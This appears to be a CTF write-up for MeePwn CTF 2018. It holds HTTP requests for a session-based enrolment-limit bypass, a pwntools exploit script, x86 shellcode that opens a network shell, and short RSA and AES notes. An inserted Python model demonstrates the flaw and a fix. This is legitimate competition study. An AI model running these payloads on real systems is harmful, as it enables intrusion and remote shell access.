Friday, July 20, 2018

BAD MINTON - Meepwnctf 2018

# 0xBAD MINTON

## Generate token which has more than 3 courses enrolled
* Log in to one account with multiple `PHPSESSID` values: after logging in with `PHPSESSID=z1`, change the value and log in again, e.g. z1, z2, z3.

```
GET /login.php?username=tokiomonster17&password=tokiomonster17 HTTP/1.1
Host: 178.128.84.72
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://178.128.84.72/courses.php
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=z1
Connection: close
```

* Enroll in courses with PHPSESSID z1, z2, z3

```
GET /login.php?action=enroll HTTP/1.1
Host: 178.128.84.72
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://178.128.84.72/courses.php
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=z2
Connection: close
```

* Now we have a token with more than 3 courses enrolled

```
GET /courses.php HTTP/1.1
Host: 178.128.84.72
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://178.128.84.72/courses.php
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=z3
Connection: close
```

```
<a class="btn btn-outline-primary" style="border-radius: 5px 0px 0px 5px;" href="http://178.128.84.72/login.php?action=logout">Hello tokiomonster17</a>
<a class="btn btn-outline-success" style="border-radius: 0px 0px 0px 0px;" href="#">Enrolled: 6 courses</a>
<a class="btn btn-outline-danger" style="border-radius: 0px 5px 5px 0px;" href="#3ae3566f837d529c3104a2734ecc596347918aaf78db90501d380b66d0de8992">Token: 3ae3566f837d529c3104a2734ecc596347918aaf78db90501d380b66d0de8992</a>
```
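The limit bypass above works because the enrolment cap is tracked per PHP session rather than per account. The following Python model, added here and not part of the write-up or the challenge's code, replays the three-session flow against a per-session check and against an account-level atomic check (the class, method names and in-memory stores are constructed for illustration):

```python
import threading

MAX_COURSES = 3


class Enrollment:
    """Constructed in-memory model of the course-enrolment logic."""

    def __init__(self):
        self.sessions = {}   # session id -> {"user": str, "courses": set()}
        self.accounts = {}   # user -> set of course ids (the authoritative record)
        self.lock = threading.Lock()

    def login(self, session_id, user):
        # Every login under a new PHPSESSID gets its own per-session view.
        self.sessions[session_id] = {"user": user, "courses": set()}
        self.accounts.setdefault(user, set())

    def enroll_vulnerable(self, session_id, course):
        # Flaw: the cap is checked against the session's own counter only.
        s = self.sessions[session_id]
        if len(s["courses"]) >= MAX_COURSES:
            return False
        s["courses"].add(course)
        self.accounts[s["user"]].add(course)  # account total grows past the cap
        return True

    def enroll_fixed(self, session_id, course):
        # Fix: check and update the account record under one lock, so neither
        # extra sessions nor concurrent requests can exceed the cap.
        user = self.sessions[session_id]["user"]
        with self.lock:
            enrolled = self.accounts[user]
            if course in enrolled or len(enrolled) >= MAX_COURSES:
                return False
            enrolled.add(course)
        return True

    def enrolled_count(self, user):
        return len(self.accounts[user])


def replay(enroll_method):
    """Replays the write-up: one user logged in under three session ids,
    two enrolments per session; returns the account's total."""
    app = Enrollment()
    course = 0
    for sid in ("z1", "z2", "z3"):
        app.login(sid, "tokiomonster17")
        for _ in range(2):
            getattr(app, enroll_method)(sid, course)
            course += 1
    return app.enrolled_count("tokiomonster17")
```

`replay("enroll_vulnerable")` reproduces the "Enrolled: 6 courses" state, while `replay("enroll_fixed")` stops at 3.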

## Pwn

```
from pwn import *

r = remote('178.128.84.72', 9997)
flag = 0x604070  # address the author targets, named `flag` in the write-up
# token obtained from courses.php above (bytes, so this also runs on Python 3)
token = b'3ae3566f837d529c3104a2734ecc596347918aaf78db90501d380b66d0de8992'
r.recvuntil(b"Token> ")
r.sendline(token)
# six enrolled courses give six prompts; each one is answered with the address repeated
for i in range(6):
    r.recvuntil(b">")
    r.send(p64(flag) * 128)
r.recvuntil(b">")
r.sendline(b"3")
r.interactive()
```

babysandbox - Meepwnctf 2018

```
import requests
import base64

# shellcode from the write-up, kept as bytes so base64 encoding works on Python 3
shellcode = b"\x58\x85\xC0\x0F\x84\x61\x00\x00\x00\x68\x80\xc7\xd7\xff\x5e\x66\x68\x7a\x69\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xce\x31\xC0\x40\x89\xC3\xCD\x80"
# the service expects the payload base64-encoded in a JSON body
payload = {"payload": base64.b64encode(shellcode).decode()}
s = requests.session()
s.get("http://178.128.100.75/")
r = s.post("http://178.128.100.75/exploit", json=payload)
print(r.content)
```

Thursday, July 19, 2018

Bazik - ESOR Meepwnctf 2018

BAZIK
nc 206.189.92.209 31333


This challenge turns out to be RSA.

From the public key we get n and e (e = 3, which is small).

We can see that the decrypted test data has the form: Your OTP for transaction #731337 in ABCXYZ Bank is 451150457.

In my opinion the flag probably has the same form, so this is a Coppersmith attack.



Solution


flag: MeePwnCTF{blackbox-rsa-is-0xd34d}


ESOR

This challenge is AES-CBC crypto.

It gives us the IV and the key, and even the decrypt function, so it is quite easy.

We just take one encrypted chunk, rebuild the code locally, and print at the spot where the result appears, and that's it.

flag: MeePwnCTF{pooDL3-this-is-la-vie-en-rose-P00dle!}